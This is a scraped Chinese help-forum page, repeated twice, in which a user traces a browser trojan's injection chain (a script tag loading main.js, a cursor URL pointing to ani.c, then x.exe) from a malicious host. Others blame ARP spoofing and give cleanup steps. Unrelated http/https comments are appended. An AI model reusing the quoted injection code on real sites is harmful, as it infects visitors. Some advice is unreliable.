http://flash.958167.com/main.js木马如何彻底解决?(非格盘)
来自: 更新日期:早些时候
检测到:木马程序 Trojan.JS.Agent.aav URL: http://js.tongji.cn.yahoo.com/1061376/ystat.js~
在进程中找了一圈,什么也没发现。下载该页面代码
Ms06046.htm中的内容:
<script language=javascript src=http://flash.958167.com/main.js></script>
main.js中的内容指向:document.write("<DIV style=\"CURSOR: url('http://flash.958167.com/ani.c')\">
ani.c中有这样一句:……/x.exe
附上以上三个文件及木马是吧~~
解决大法~~呵呵~
中毒三天后解决问题。是局域网内一同学未装杀软裸奔,中arp毒后ip伪装成局域网网关ip
使我们本机内并没有毒,一联网就出现问题(因为局域网用户要通过网关上网)
而他关机后我们上网又使用原有安全网关,从而恢复正常
解决方法如下:
1.扫描杀毒,清除ie缓存,cookies;
2.查看同局域网内的电脑是否出现同样状况——可以打开局域网内最临近的另一电脑,
开任意网页后,右击看看源文件,看是否首行注入flash.958167相关代码。有则判定局域网已中毒
3.下载arp防火墙http://dl.360safe.com/360AntiArp.exe,安装运行后,即可正常上网。但以后必须一直开着防火墙
4.要彻底解决问题,需要查看拦截arp攻击记录,找到攻击者ip,找局域网网络中心,确定ip对应电脑
找到机主,让他彻底杀毒!
5.“肇事”电脑的安全问题解决后,网络恢复正常,即可不开arp防火墙了。
这应该是个连接网页的恶意程序,关键是要找出来程序的根源以及感染的地方。你说格C盘装系统还有说明不光在C盘里,其它盘里也应该存在。所以重装系统后还会感染。教你个方法可以试一下,重装系统后进安全模式先全面查杀一下病毒,看看能不能找出根源。找到的话删除文件。其它方法由于没看到不好具体下结论
1.IP 被人盯着呢...
2.IE/windows 有问题
3."flash.958167.com/" 病毒网站
4.写到虚拟内存中
5.c盘内无病毒原文件,看看别盘
中"System Volume Information"文件夹
6.完全格式化硬盘
照你的情况看应属3或5
---木马是很顽固地
格了C盘,又出来病毒只能说明病毒在C盘外的其它盘中均有病毒.
你可以右击其它盘符选打开看下其它盘中是否有AUTORUN.INF这个的文件.建议关掉自动播放功能GPEDIT.MSC中设置.再就是看下EXE等文件的关联打开CMD.输入:.EXE=EXEFILE.最后进安全模式杀毒.
建议用NOD32这款杀毒软件
用金山啊 我就是用这个杀的,瑞星是采用类似嵌入方式查毒的对这样的病毒无效的 我还是特意买了金山的卡才 杀下去的
v
http://flash.958167.com/main.js木马如何彻底解决?(非格盘)视频
相关评论:19540233139:http:\/\/开头的网址是什么协议?
慎琳韵115:\/\/开头的链接是一个特定的网络协议,类似于常见的http:\/\/或https:\/\/开头,但指向的是115网盘的服务。1. 基本使用:当你在浏览器中输入一个以115:\/\/开头的链接时,浏览器会识别该协议,并尝试连接到115网盘的相关服务。这与输入http:\/\/或https:\/\/开头的网址类似,不同的协议指向不同的网络服...
19540233139:http和https有什么区别?
慎琳韵1、安全性不同 HTTP 明文传输,数据都是未加密的,安全性较差;HTTPS(SSL+HTTP) 数据传输过程是加密的,安全性较好。2、是否需要CA证书 使用 HTTPS 协议需要到 CA(Certificate Authority,数字证书认证机构) 申请证书,一般免费证书较少,因而需要一定费用。而使用 HTTP 协议是不需要用到CA证书的。3...
19540233139:什么是https和http
慎琳韵https:\/\/是http:\/\/的安全版本。https在传输数据时会加密数据,这可以保护用户在网站上的敏感信息,如登录凭证和个人信息。http:\/\/不提供数据加密,这意味着数据在传输过程中可能会被第三方截获和读取。2.加密方式:https:\/\/使用SSL或其继任者TLS来加密数据。这些安全协议确保了数据在客户端和服务器之间...
19540233139:什么是https:\/\/协议和http:\/\/协议?
慎琳韵http:\/\/:HTTP协议是互联网上最常见的协议之一,用于数据的传输。然而,它并不提供数据在传输过程中的加密保护。这意味着使用HTTP传输数据时,数据可能会被第三方拦截或窃取。因此,对于需要保密的信息,如登录信息或信用卡信息,不建议通过HTTP进行传输。3. 应用场景的不同 除了安全性差异外,HTTPS和HTTP...
19540233139:http:\/\/和www有什么区别啊?
慎琳韵http:\/\/www.是互联网上的一个常见的前缀,用于标识一个网站的地址。当我们访问一个网站时,输入的网址通常都是以“http:\/\/”或“https:\/\/”开头的。其中,“http”是“HyperText Transfer Protocol”的缩写,意为超文本传输协议,这是一种使浏览器和...
19540233139:http:是什么意思?
慎琳韵HTTP:是超文本传输协议(Hypertext Transfer Protocol)的缩写。HTTP是一种应用层的协议,它规定了客户端和服务器之间通信的规则。这种通信通常发生在Web浏览器中,当用户访问一个网页时,浏览器会向服务器发送HTTP请求,请求获取网页的内容。服务器收到请求后,会处理该请求并返回相应的HTTP响应,其中包含了...
19540233139:http协议和https协议的区别
慎琳韵http协议和https协议的区别:一、传输信息安全性不同 1、http协议:是超文本传输协议,信息是明文传输。如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息。2、https协议:是具有安全性的ssl加密传输协议,为浏览器和服务器之间的通信加密,确保数据传输的安全。二、连接方式...
19540233139:什么是http和https
慎琳韵网址以"http:\/\/"或"https:\/\/"开头,代表了它们使用不同的协议来传输数据,具体意义如下:"http"是“超文本传输协议”(Hypertext Transfer Protocol)的缩写。这个协议定义了客户端(通常是用户的网页浏览器)和服务器之间如何交换网页和其他资源。HTTP不提供数据加密,因此数据在传输过程中是明文的,可能...
19540233139:https:\/\/和http:\/\/的区别是什么?
慎琳韵https:\/\/和http:\/\/的区别主要如下:1、https协议需要到ca申请证书,一般免费证书较少,因而需要一定费用。2、http是超文本传输协议,信息是明文传输,https则是具有安全性的ssl加密传输协议。3、http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后者是443。4、http的连接很简单,...
19540233139:HTTP和HTTPS的区别?
慎琳韵HTTPS和HTTP的区别主要如下:1、是否免费:https协议需要到ca申请证书,一般免费证书较少,因而需要一定费用;http一般是免费的。2、安全性:http是超文本传输协议,信息是明文传输;https则是具有安全性的ssl加密传输协议。3、连接方式:http和https使用的是完全不同的连接方式,用的端口也不一样,前者是...
你好,这是一个雅虎统计的网页,将该文件删除后使用杀软全盘扫描系统即可,问题应该不大.
首先关掉你所有正在运行的程序,包括IE在内.打开我的电脑,在地址栏里面把"C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5"会进入这个文件夹,把这个文件夹下面所有的"文件夹"删除掉
卡马不时弹出检测窗口:恶意 HTTP 对象 <[url=http://flash.958167.com/Ms06046.htm]http://flash.958167.com/Ms06046.htm[/url]>: 拒绝访问.在进程中找了一圈,什么也没发现。下载该页面代码
Ms06046.htm中的内容:
<script language=javascript src=http://flash.958167.com/main.js></script>
main.js中的内容指向:document.write("<DIV style=\"CURSOR: url('http://flash.958167.com/ani.c')\">
ani.c中有这样一句:……/x.exe
附上以上三个文件及木马是吧~~
解决大法~~呵呵~
中毒三天后解决问题。是局域网内一同学未装杀软裸奔,中arp毒后ip伪装成局域网网关ip
使我们本机内并没有毒,一联网就出现问题(因为局域网用户要通过网关上网)
而他关机后我们上网又使用原有安全网关,从而恢复正常
解决方法如下:
1.扫描杀毒,清除ie缓存,cookies;
2.查看同局域网内的电脑是否出现同样状况——可以打开局域网内最临近的另一电脑,
开任意网页后,右击看看源文件,看是否首行注入flash.958167相关代码。有则判定局域网已中毒
3.下载arp防火墙http://dl.360safe.com/360AntiArp.exe,安装运行后,即可正常上网。但以后必须一直开着防火墙
4.要彻底解决问题,需要查看拦截arp攻击记录,找到攻击者ip,找局域网网络中心,确定ip对应电脑
找到机主,让他彻底杀毒!
5.“肇事”电脑的安全问题解决后,网络恢复正常,即可不开arp防火墙了。
这应该是个连接网页的恶意程序,关键是要找出来程序的根源以及感染的地方。你说格C盘装系统还有说明不光在C盘里,其它盘里也应该存在。所以重装系统后还会感染。教你个方法可以试一下,重装系统后进安全模式先全面查杀一下病毒,看看能不能找出根源。找到的话删除文件。其它方法由于没看到不好具体下结论
1.IP 被人盯着呢...
2.IE/windows 有问题
3."flash.958167.com/" 病毒网站
4.写到虚拟内存中
5.c盘内无病毒原文件,看看别盘
中"System Volume Information"文件夹
6.完全格式化硬盘
照你的情况看应属3或5
---木马是很顽固地
格了C盘,又出来病毒只能说明病毒在C盘外的其它盘中均有病毒.
你可以右击其它盘符选打开看下其它盘中是否有AUTORUN.INF这个的文件.建议关掉自动播放功能GPEDIT.MSC中设置.再就是看下EXE等文件的关联打开CMD.输入:.EXE=EXEFILE.最后进安全模式杀毒.
建议用NOD32这款杀毒软件
用金山啊 我就是用这个杀的,瑞星是采用类似嵌入方式查毒的对这样的病毒无效的 我还是特意买了金山的卡才 杀下去的
v
http://flash.958167.com/main.js木马如何彻底解决?(非格盘)视频
相关评论:
慎琳韵115:\/\/开头的链接是一个特定的网络协议,类似于常见的http:\/\/或https:\/\/开头,但指向的是115网盘的服务。1. 基本使用:当你在浏览器中输入一个以115:\/\/开头的链接时,浏览器会识别该协议,并尝试连接到115网盘的相关服务。这与输入http:\/\/或https:\/\/开头的网址类似,不同的协议指向不同的网络服...
慎琳韵1、安全性不同 HTTP 明文传输,数据都是未加密的,安全性较差;HTTPS(SSL+HTTP) 数据传输过程是加密的,安全性较好。2、是否需要CA证书 使用 HTTPS 协议需要到 CA(Certificate Authority,数字证书认证机构) 申请证书,一般免费证书较少,因而需要一定费用。而使用 HTTP 协议是不需要用到CA证书的。3...
慎琳韵https:\/\/是http:\/\/的安全版本。https在传输数据时会加密数据,这可以保护用户在网站上的敏感信息,如登录凭证和个人信息。http:\/\/不提供数据加密,这意味着数据在传输过程中可能会被第三方截获和读取。2.加密方式:https:\/\/使用SSL或其继任者TLS来加密数据。这些安全协议确保了数据在客户端和服务器之间...
慎琳韵http:\/\/:HTTP协议是互联网上最常见的协议之一,用于数据的传输。然而,它并不提供数据在传输过程中的加密保护。这意味着使用HTTP传输数据时,数据可能会被第三方拦截或窃取。因此,对于需要保密的信息,如登录信息或信用卡信息,不建议通过HTTP进行传输。3. 应用场景的不同 除了安全性差异外,HTTPS和HTTP...
慎琳韵http:\/\/www.是互联网上的一个常见的前缀,用于标识一个网站的地址。当我们访问一个网站时,输入的网址通常都是以“http:\/\/”或“https:\/\/”开头的。其中,“http”是“HyperText Transfer Protocol”的缩写,意为超文本传输协议,这是一种使浏览器和...
慎琳韵HTTP:是超文本传输协议(Hypertext Transfer Protocol)的缩写。HTTP是一种应用层的协议,它规定了客户端和服务器之间通信的规则。这种通信通常发生在Web浏览器中,当用户访问一个网页时,浏览器会向服务器发送HTTP请求,请求获取网页的内容。服务器收到请求后,会处理该请求并返回相应的HTTP响应,其中包含了...
慎琳韵http协议和https协议的区别:一、传输信息安全性不同 1、http协议:是超文本传输协议,信息是明文传输。如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息。2、https协议:是具有安全性的ssl加密传输协议,为浏览器和服务器之间的通信加密,确保数据传输的安全。二、连接方式...
慎琳韵网址以"http:\/\/"或"https:\/\/"开头,代表了它们使用不同的协议来传输数据,具体意义如下:"http"是“超文本传输协议”(Hypertext Transfer Protocol)的缩写。这个协议定义了客户端(通常是用户的网页浏览器)和服务器之间如何交换网页和其他资源。HTTP不提供数据加密,因此数据在传输过程中是明文的,可能...
慎琳韵https:\/\/和http:\/\/的区别主要如下:1、https协议需要到ca申请证书,一般免费证书较少,因而需要一定费用。2、http是超文本传输协议,信息是明文传输,https则是具有安全性的ssl加密传输协议。3、http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后者是443。4、http的连接很简单,...
慎琳韵HTTPS和HTTP的区别主要如下:1、是否免费:https协议需要到ca申请证书,一般免费证书较少,因而需要一定费用;http一般是免费的。2、安全性:http是超文本传输协议,信息是明文传输;https则是具有安全性的ssl加密传输协议。3、连接方式:http和https使用的是完全不同的连接方式,用的端口也不一样,前者是...
